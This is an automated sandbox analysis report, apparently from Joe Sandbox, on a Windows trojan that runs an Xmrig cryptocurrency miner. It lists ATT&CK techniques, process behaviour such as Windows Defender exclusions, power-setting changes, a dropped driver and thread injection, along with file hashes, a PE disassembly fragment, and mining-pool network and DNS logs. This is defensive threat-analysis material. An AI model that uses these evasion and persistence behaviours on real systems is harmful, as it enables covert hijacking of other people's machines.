              Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 211 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 1 Application Layer Protocol | Traffic Duplication | Data Destruction
              Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 12 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
              Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Obfuscated Files or Information | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
              DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
              Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 File Deletion | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              Behavior Graph ID: 1556039 | Sample: rtYpMDeKUq.exe | Startdate: 14/11/2024 | Architecture: WINDOWS | Score: 100

              Start
                Signatures: Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; Yara detected Xmrig cryptocurrency miner; 6 other signatures
                DNS: xmr-eu1.nanopool.org (DNS related to crypt mining pools)
                lzsbffridksl.exe 1 (started)
                  Dropped: C:\Windows\Temp\jvocdauqvwbp.sys, PE32+
                  Signatures: Multi AV Scanner detection for dropped file; Allocates memory in foreign processes; Modifies the context of a thread in another process (thread injection); Sample is not signed and drops a device driver
                  svchost.exe (started)
                    Network: 54.37.232.103, 10343, 49704 OVHFR France
                    Signatures: Query firmware table information (likely to detect VMs); Found strings related to Crypto-Mining; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  powershell.exe (started)
                    conhost.exe (started)
                  cmd.exe 1 (started)
                    2 other processes
                  5 other processes
                    4 other processes
                rtYpMDeKUq.exe 1 2 (started)
                  Dropped: C:\ProgramData\...\lzsbffridksl.exe, PE32+
                  Signatures: Uses powercfg.exe to modify the power settings; Adds a directory exclusion to Windows Defender; Modifies power options to not sleep / hibernate
                  powershell.exe 23 (started)
                    Signature: Loading BitLocker PowerShell Module
                    conhost.exe (started)
                      Signatures: Adds a directory exclusion to Windows Defender; Modifies power options to not sleep / hibernate
                  cmd.exe 1 (started)
                    conhost.exe (started)
                    wusa.exe (started)
                  powercfg.exe 1 (started)
                    conhost.exe (started)
                  7 other processes
                    conhost.exe (started)
                    6 other processes

              Source | Detection | Scanner | Label
              rtYpMDeKUq.exe | 66% | ReversingLabs | Win64.Trojan.MintZard
              Source | Detection | Scanner | Label
              C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe | 66% | ReversingLabs | Win64.Trojan.MintZard
              C:\Windows\Temp\jvocdauqvwbp.sys | 5% | ReversingLabs |
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              xmr-eu1.nanopool.org | 51.89.23.91 | true | false | | high
              Name | Source | Malicious | Antivirus Detection | Reputation
              http://crl.cloudflare.com/origin_ca.crl0 | svchost.exe, 00000026.00000002.2736886046.0000020A9D080000.00000004.00000020.00020000.00000000.sdmp | false | | high
              http://ocsp.cloudflare.com/origin_ca | svchost.exe, 00000026.00000002.2736952891.0000020A9D0A6000.00000004.00000020.00020000.00000000.sdmp | false | | high
              http://ocsp.cloudflare.com/origin_ca0 | svchost.exe, 00000026.00000002.2736886046.0000020A9D080000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000026.00000002.2736858015.0000020A9D06B000.00000004.00000020.00020000.00000000.sdmp | false | | high
              http://crl.cloudflare.com/origin_ca.crl | svchost.exe, 00000026.00000002.2736886046.0000020A9D080000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000026.00000002.2736952891.0000020A9D0A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000026.00000002.2736858015.0000020A9D06B000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://xmrig.com/docs/algorithms | svchost.exe, 00000026.00000002.2735503667.0000000140001000.00000040.00000001.00020000.00000000.sdmp | false | | high
              IP | Domain | Country | ASN | ASN Name | Malicious
              54.37.232.103 | unknown | France | 16276 | OVHFR | false
              Joe Sandbox version: 41.0.0 Charoite
              Analysis ID: 1556039
              Start date and time: 2024-11-14 20:30:07 +01:00
              Joe Sandbox product: CloudBasic
              Overall analysis duration: 0h 6m 51s
              Hypervisor based Inspection enabled: false
              Report type: full
              Cookbook file name: default.jbs
              Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of new started processes analysed: 44
              Number of new started drivers analysed: 0
              Number of existing processes analysed: 0
              Number of existing drivers analysed: 0
              Number of injected processes analysed: 0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode: default
              Analysis stop reason: Timeout
              Sample name: rtYpMDeKUq.exe (renamed because original name is a hash value)
              Original Sample Name: 3829cf00079dd383532ac6637444081a9752f77d186dbdcbafcc44ddde0d9cf3.exe
              Detection: MAL
              Classification: mal100.spyw.evad.mine.winEXE@56/12@1/1
              EGA Information:
              • Successful, ratio: 75%
              HCA Information: Failed
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Execution Graph export aborted for target svchost.exe, PID 5588 because there are no executed functions
              • Not all processes were analyzed; the report is missing behavior information
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size getting too big, too many NtCreateKey calls found.
              • VT rate limit hit for: rtYpMDeKUq.exe
              Time | Type | Description
              14:31:13 | API Interceptor | 31x Sleep call for process: powershell.exe modified
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          54.37.232.103ahlntQUj2t.exeGet hashmaliciousXmrigBrowse
                            file.exeGet hashmaliciousXmrigBrowse
                              12Jh49DCAj.exeGet hashmaliciousXmrigBrowse
                                file.exeGet hashmaliciousXmrigBrowse
                                  Chrome.exeGet hashmaliciousXmrigBrowse
                                    SecuriteInfo.com.Win64.Evo-gen.9790.15318.exeGet hashmaliciousXmrigBrowse
                                      setup.exeGet hashmaliciousXmrigBrowse
                                        SecuriteInfo.com.Win64.TrojanX-gen.22735.27744.exeGet hashmaliciousXmrigBrowse
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          xmr-eu1.nanopool.orgNH95Vhokye.exeGet hashmaliciousXmrigBrowse
                                          • 54.37.137.114
                                          ahlntQUj2t.exeGet hashmaliciousXmrigBrowse
                                          • 54.37.232.103
                                          file.exeGet hashmaliciousXmrigBrowse
                                          • 163.172.154.142
                                          HmA7s2gaa5.exeGet hashmaliciousXmrigBrowse
                                          • 162.19.224.121
                                          12Jh49DCAj.exeGet hashmaliciousXmrigBrowse
                                          • 51.15.65.182
                                          Ky4J8k89A7.exeGet hashmaliciousStealc, Vidar, XmrigBrowse
                                          • 51.15.58.224
                                          boooba.exeGet hashmaliciousXmrigBrowse
                                          • 51.15.58.224
                                          2HUgVjrn3O.exeGet hashmaliciousXmrigBrowse
                                          • 51.15.58.224
                                          SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exeGet hashmaliciousXmrigBrowse
                                          • 141.94.23.83
                                          Yf4yviDxwF.exeGet hashmaliciousXmrigBrowse
                                          • 54.37.232.103
Match: OVHFR
Associated Sample Name / URL | Detection | Threat Name | Context
https://us10.mipcm.com:9743/pub/windows/mipc/v9.1.1.2201131522/MIPC_Setup_v9.1.1.2201131522.exe | malicious | Unknown | 54.39.107.85
Unit 2_week 4 2024.pptx | malicious | HTMLPhisher | 54.38.113.4
https://url.us.m.mimecastprotect.com/s/7XsKCQWmqkh6El9PsPhEHGZMGK?domain=hbgone.docdroid.com | malicious | Unknown | 54.37.79.95
https://www.patrimoine-commerce.com/ | malicious | Unknown | 54.37.14.19
https://www.anwesso.com/link.php?link=3D78_02_04_79_88_2B016-4C-01-3D9662EEC8D094AFED274D8E17627986-06D38F7B48CB30B897 | malicious | Unknown | 54.36.109.16
https://www.softwareaktion.com/kostenloser-vergleich | malicious | Unknown | 54.36.109.16
https://inps-conferma-dati.it/ | malicious | Unknown | 178.32.138.212
o885M9rc16.exe | malicious | AsyncRAT, AveMaria, StormKitty, Vidar | 139.99.85.8
o885M9rc16.exe | malicious | AsyncRAT, AveMaria, StormKitty, Vidar | 139.99.85.8
https://www.patrimoine-commerce.com/ | malicious | Unknown | 54.37.14.19
No context

Match: C:\Windows\Temp\jvocdauqvwbp.sys
Associated Sample Name / URL | Detection | Threat Name
n7ZKbApaa3.dll | malicious | LummaC, Xmrig
ICBM.exe | malicious | Xmrig
PqSIlYOaIF.exe | malicious | LummaC, Xmrig
NH95Vhokye.exe | malicious | Xmrig
Eulen.exe | malicious | Xmrig
U9jAFGWgPG.exe | malicious | Phorpiex, Xmrig
file.exe | malicious | Amadey, Xmrig
file.exe | malicious | Xmrig
ICBM.exe | malicious | Xmrig
file.exe | malicious | Xmrig
Process: C:\Users\user\Desktop\rtYpMDeKUq.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 2629632
Entropy (8bit): 6.542373537682104
Encrypted: false
SSDEEP: 49152:4FUPj9hHjc2Hil9gJaEgCR37gGVMISw6RtmGNIOLD1ciNKWI2O6xYWb3Kuz/+n:77vHM9gJaFCRPS3f7LrrOaYY6u8
MD5: 9B1749C1BB9E8A354404B8A57DE68EC6
SHA1: 4C8838D22EFC926551BE0E77ECD1E6A68E15F6C4
SHA-256: 3829CF00079DD383532AC6637444081A9752F77D186DBDCBAFCC44DDDE0D9CF3
SHA-512: 9E83796791FB49C0EE6592CAD4A294B86EB6EC624385F3DF8E040F9BAF545071637167D4C5EE6E9DA17AAD4F96251FC09DA71282EF7341F1D91D3FC78E2059EA
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 66%
                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....w5g.........."......|....'.....@..........@..............................(...........`................................................. ...<............@(..............p(.x...............................(.......8...............X............................text...6z.......|.................. ..`.rdata..h...........................@..@.data...P.'......z'.................@....pdata.......@(.......(.............@..@.00cfg.......P(.......(.............@..@.tls.........`(.......(.............@....reloc..x....p(.......(.............@..B................................................................................................................................................................................................................................................................................................................................................
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 1.1940658735648508
Encrypted: false
SSDEEP: 3:Nlllul3nqth:NllUa
MD5: 851531B4FD612B0BC7891B3F401A478F
SHA1: 483F0D1E71FB0F6EFF159AA96CC82422CF605FB3
SHA-256: 383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F
SHA-512: A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931
Malicious: false
                                                              Preview:@...e.................................&..............@..........
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
Three further dropped files with metadata identical to the entry above (Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; ASCII text, 60 bytes; MD5 D17FE0A3F47BE24A6453E9EF58C94641; SHA-256 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7; Malicious: false; Preview: # PowerShell test file to determine AppLocker lockdown mode).
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 0.34726597513537405
Encrypted: false
SSDEEP: 3:Nlll:Nll
MD5: 446DD1CF97EABA21CF14D03AEBC79F27
SHA1: 36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256: A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512: A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious: false
                                                              Preview:@...e...........................................................
Four further dropped files with metadata identical to the earlier AppLocker test file entry (Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; ASCII text, 60 bytes; MD5 D17FE0A3F47BE24A6453E9EF58C94641; SHA-256 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7; Malicious: false; Preview: # PowerShell test file to determine AppLocker lockdown mode).
Process: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe
File Type: PE32+ executable (native) x86-64, for MS Windows
Category: dropped
Size (bytes): 14544
Entropy (8bit): 6.2660301556221185
Encrypted: false
SSDEEP: 192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
MD5: 0C0195C48B6B8582FA6F6373032118DA
SHA1: D25340AE8E92A6D29F599FEF426A2BC1B5217299
SHA-256: 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
SHA-512: AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 5%
Joe Sandbox View:
• Filename: n7ZKbApaa3.dll, Detection: malicious
• Filename: ICBM.exe, Detection: malicious
• Filename: PqSIlYOaIF.exe, Detection: malicious
• Filename: NH95Vhokye.exe, Detection: malicious
• Filename: Eulen.exe, Detection: malicious
• Filename: U9jAFGWgPG.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: ICBM.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
File type: PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit): 6.542373537682104
TrID:
• Win64 Executable GUI (202006/5) 92.65%
• Win64 Executable (generic) (12005/4) 5.51%
• Generic Win/DOS Executable (2004/3) 0.92%
• DOS Executable Generic (2002/1) 0.92%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: rtYpMDeKUq.exe
File size: 2'629'632 bytes
MD5: 9b1749c1bb9e8a354404b8a57de68ec6
SHA1: 4c8838d22efc926551be0e77ecd1e6a68e15f6c4
SHA256: 3829cf00079dd383532ac6637444081a9752f77d186dbdcbafcc44ddde0d9cf3
SHA512: 9e83796791fb49c0ee6592cad4a294b86eb6ec624385f3df8e040f9baf545071637167d4c5ee6e9da17aad4f96251fc09da71282ef7341f1d91d3fc78e2059ea
SSDEEP: 49152:4FUPj9hHjc2Hil9gJaEgCR37gGVMISw6RtmGNIOLD1ciNKWI2O6xYWb3Kuz/+n:77vHM9gJaFCRPS3f7LrrOaYY6u8
TLSH: 23C533C51571A0FDC5DDA3B86C4A2DA23C6E987893C063F39BF0943520F46D962BCB96
                                                              File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....w5g.........."......|....'.....@..........@..............................(...........`........................................
Icon Hash: 00928e8e8686b000
Entrypoint: 0x140001140
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x140000000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp: 0x673577BF [Thu Nov 14 04:08:31 2024 UTC]
TLS Callbacks: 0x40001760, 0x1, 0x400017e0, 0x1
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: de41d4e0545d977de6ca665131bb479a
                                                              Instruction
                                                              dec eax
                                                              sub esp, 28h
                                                              dec eax
                                                              mov eax, dword ptr [00007ED5h]
                                                              mov dword ptr [eax], 00000001h
                                                              call 00007F059113D90Fh
                                                              nop
                                                              nop
                                                              nop
                                                              dec eax
                                                              add esp, 28h
                                                              ret
                                                              nop
                                                              inc ecx
                                                              push edi
                                                              inc ecx
                                                              push esi
                                                              push esi
                                                              push edi
                                                              push ebx
                                                              dec eax
                                                              sub esp, 20h
                                                              dec eax
                                                              mov eax, dword ptr [00000030h]
                                                              dec eax
                                                              mov edi, dword ptr [eax+08h]
                                                              dec eax
                                                              mov esi, dword ptr [00007EC9h]
                                                              xor eax, eax
                                                              dec eax
                                                              cmpxchg dword ptr [esi], edi
                                                              sete bl
                                                              je 00007F059113D930h
                                                              dec eax
                                                              cmp edi, eax
                                                              je 00007F059113D92Bh
                                                              dec esp
                                                              mov esi, dword ptr [00009651h]
                                                              nop word ptr [eax+eax+00000000h]
                                                              mov ecx, 000003E8h
                                                              inc ecx
                                                              call esi
                                                              xor eax, eax
                                                              dec eax
                                                              cmpxchg dword ptr [esi], edi
                                                              sete bl
                                                              je 00007F059113D907h
                                                              dec eax
                                                              cmp edi, eax
                                                              jne 00007F059113D8E9h
                                                              dec eax
                                                              mov edi, dword ptr [00007E90h]
                                                              mov eax, dword ptr [edi]
                                                              cmp eax, 01h
                                                              jne 00007F059113D90Eh
                                                              mov ecx, 0000001Fh
                                                              call 00007F0591144FE4h
                                                              jmp 00007F059113D929h
                                                              cmp dword ptr [edi], 00000000h
                                                              je 00007F059113D90Bh
                                                              mov byte ptr [002817C9h], 00000001h
                                                              jmp 00007F059113D91Bh
                                                              mov dword ptr [edi], 00000001h
                                                              dec eax
                                                              mov ecx, dword ptr [00007E7Ah]
                                                              dec eax
                                                              mov edx, dword ptr [00007E7Bh]
                                                              call 00007F0591144FDBh
                                                              mov eax, dword ptr [edi]
                                                              cmp eax, 01h
                                                              jne 00007F059113D91Bh
                                                              dec eax
                                                              mov ecx, dword ptr [00007E50h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa520 | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x284000 | 0x180 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x287000 | 0x78 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x90a0 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x9410 | 0x138 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xa6b8 | 0x158 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x7a36 | 0x7c00 | 508e85d2962e224d87571c533e1a9f68 | False | 0.5040637600806451 | data | 6.178416223530926 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9000 | 0x1c68 | 0x1e00 | 73c300cabbdbd9cad11f354b142892f3 | False | 0.44140625 | zlib compressed data | 4.593464540807902 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xb000 | 0x278850 | 0x277a00 | 247d547da2f821a4ff2bb4f14416fcf9 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x284000 | 0x180 | 0x200 | 6d2c944d41c64c054606dec9385330ca | False | 0.505859375 | data | 3.105831651046345 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.00cfg | 0x285000 | 0x10 | 0x200 | b18c7380298e104adf73576fa46bccc1 | False | 0.04296875 | data | 0.15127132530476972 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls | 0x286000 | 0x10 | 0x200 | bf619eac0cdf3f68d496ea9344137e8b | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc | 0x287000 | 0x78 | 0x200 | d5214b737f5e4bf102542b863347402c | False | 0.2265625 | data | 1.420576874634762 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
DLL | Import
msvcrt.dll | __C_specific_handler, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _commode, _fmode, _initterm, _onexit, _wcsicmp, _wcsnicmp, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, memset, signal, strlen, strncmp, vfprintf, wcscat, wcscpy, wcslen, wcsncmp
KERNEL32.dll | DeleteCriticalSection, EnterCriticalSection, GetLastError, InitializeCriticalSection, LeaveCriticalSection, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 14, 2024 20:31:18.968641996 CET | 49704 | 10343 | 192.168.2.8 | 54.37.232.103
Nov 14, 2024 20:31:18.974328995 CET | 10343 | 49704 | 54.37.232.103 | 192.168.2.8
Nov 14, 2024 20:31:18.974400043 CET | 49704 | 10343 | 192.168.2.8 | 54.37.232.103
Nov 14, 2024 20:31:18.974620104 CET | 49704 | 10343 | 192.168.2.8 | 54.37.232.103
Nov 14, 2024 20:31:18.980509996 CET | 10343 | 49704 | 54.37.232.103 | 192.168.2.8
Nov 14, 2024 20:31:19.851478100 CET | 10343 | 49704 | 54.37.232.103 | 192.168.2.8
Nov 14, 2024 20:31:19.851831913 CET | 10343 | 49704 | 54.37.232.103 | 192.168.2.8
Nov 14, 2024 20:31:19.851891994 CET | 49704 | 10343 | 192.168.2.8 | 54.37.232.103
Nov 14, 2024 20:31:19.852627993 CET | 49704 | 10343 | 192.168.2.8 | 54.37.232.103
Nov 14, 2024 20:31:19.857558966 CET | 10343 | 49704 | 54.37.232.103 | 192.168.2.8
Nov 14, 2024 20:31:20.112195015 CET | 10343 | 49704 | 54.37.232.103 | 192.168.2.8
Nov 14, 2024 20:31:20.112394094 CET | 10343 | 49704 | 54.37.232.103 | 192.168.2.8
Nov 14, 2024 20:31:20.112556934 CET | 49704 | 10343 | 192.168.2.8 | 54.37.232.103
Nov 14, 2024 20:31:20.153182983 CET | 10343 | 49704 | 54.37.232.103 | 192.168.2.8
Nov 14, 2024 20:31:20.197783947 CET | 49704 | 10343 | 192.168.2.8 | 54.37.232.103
Nov 14, 2024 20:31:26.371062040 CET | 10343 | 49704 | 54.37.232.103 | 192.168.2.8
Nov 14, 2024 20:31:26.416558027 CET | 49704 | 10343 | 192.168.2.8 | 54.37.232.103
Nov 14, 2024 20:31:36.381167889 CET | 10343 | 49704 | 54.37.232.103 | 192.168.2.8
Nov 14, 2024 20:31:36.432261944 CET | 49704 | 10343 | 192.168.2.8 | 54.37.232.103
Nov 14, 2024 20:31:46.507371902 CET | 10343 | 49704 | 54.37.232.103 | 192.168.2.8
Nov 14, 2024 20:31:46.604132891 CET | 49704 | 10343 | 192.168.2.8 | 54.37.232.103
Nov 14, 2024 20:31:56.422102928 CET | 10343 | 49704 | 54.37.232.103 | 192.168.2.8
Nov 14, 2024 20:31:56.494837046 CET | 49704 | 10343 | 192.168.2.8 | 54.37.232.103
Nov 14, 2024 20:32:06.513501883 CET | 10343 | 49704 | 54.37.232.103 | 192.168.2.8
Nov 14, 2024 20:32:06.604279041 CET | 49704 | 10343 | 192.168.2.8 | 54.37.232.103
Nov 14, 2024 20:32:16.456892967 CET | 10343 | 49704 | 54.37.232.103 | 192.168.2.8
Nov 14, 2024 20:32:16.604312897 CET | 49704 | 10343 | 192.168.2.8 | 54.37.232.103
Nov 14, 2024 20:32:29.684164047 CET | 10343 | 49704 | 54.37.232.103 | 192.168.2.8
Nov 14, 2024 20:32:29.807544947 CET | 49704 | 10343 | 192.168.2.8 | 54.37.232.103
Nov 14, 2024 20:32:32.289335966 CET | 10343 | 49704 | 54.37.232.103 | 192.168.2.8
Nov 14, 2024 20:32:32.494921923 CET | 49704 | 10343 | 192.168.2.8 | 54.37.232.103
Nov 14, 2024 20:32:42.355012894 CET | 10343 | 49704 | 54.37.232.103 | 192.168.2.8
Nov 14, 2024 20:32:42.495480061 CET | 49704 | 10343 | 192.168.2.8 | 54.37.232.103
Nov 14, 2024 20:32:52.451644897 CET | 10343 | 49704 | 54.37.232.103 | 192.168.2.8
Nov 14, 2024 20:32:52.604409933 CET | 49704 | 10343 | 192.168.2.8 | 54.37.232.103
Nov 14, 2024 20:33:02.375360966 CET | 10343 | 49704 | 54.37.232.103 | 192.168.2.8
Nov 14, 2024 20:33:02.495033979 CET | 49704 | 10343 | 192.168.2.8 | 54.37.232.103
Nov 14, 2024 20:33:11.511797905 CET | 10343 | 49704 | 54.37.232.103 | 192.168.2.8
Nov 14, 2024 20:33:11.604438066 CET | 49704 | 10343 | 192.168.2.8 | 54.37.232.103
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 14, 2024 20:31:18.956768990 CET | 59279 | 53 | 192.168.2.8 | 1.1.1.1
Nov 14, 2024 20:31:18.964504957 CET | 53 | 59279 | 1.1.1.1 | 192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 14, 2024 20:31:18.956768990 CET | 192.168.2.8 | 1.1.1.1 | 0x25d7 | Standard query (0) | xmr-eu1.nanopool.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 14, 2024 20:31:18.964504957 CET | 1.1.1.1 | 192.168.2.8 | 0x25d7 | No error (0) | xmr-eu1.nanopool.org | | 51.89.23.91 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 20:31:18.964504957 CET | 1.1.1.1 | 192.168.2.8 | 0x25d7 | No error (0) | xmr-eu1.nanopool.org | | 54.37.232.103 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 20:31:18.964504957 CET | 1.1.1.1 | 192.168.2.8 | 0x25d7 | No error (0) | xmr-eu1.nanopool.org | | 146.59.154.106 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 20:31:18.964504957 CET | 1.1.1.1 | 192.168.2.8 | 0x25d7 | No error (0) | xmr-eu1.nanopool.org | | 163.172.154.142 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 20:31:18.964504957 CET | 1.1.1.1 | 192.168.2.8 | 0x25d7 | No error (0) | xmr-eu1.nanopool.org | | 212.47.253.124 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 20:31:18.964504957 CET | 1.1.1.1 | 192.168.2.8 | 0x25d7 | No error (0) | xmr-eu1.nanopool.org | | 51.15.58.224 | A (IP address) | IN (0x0001) | false
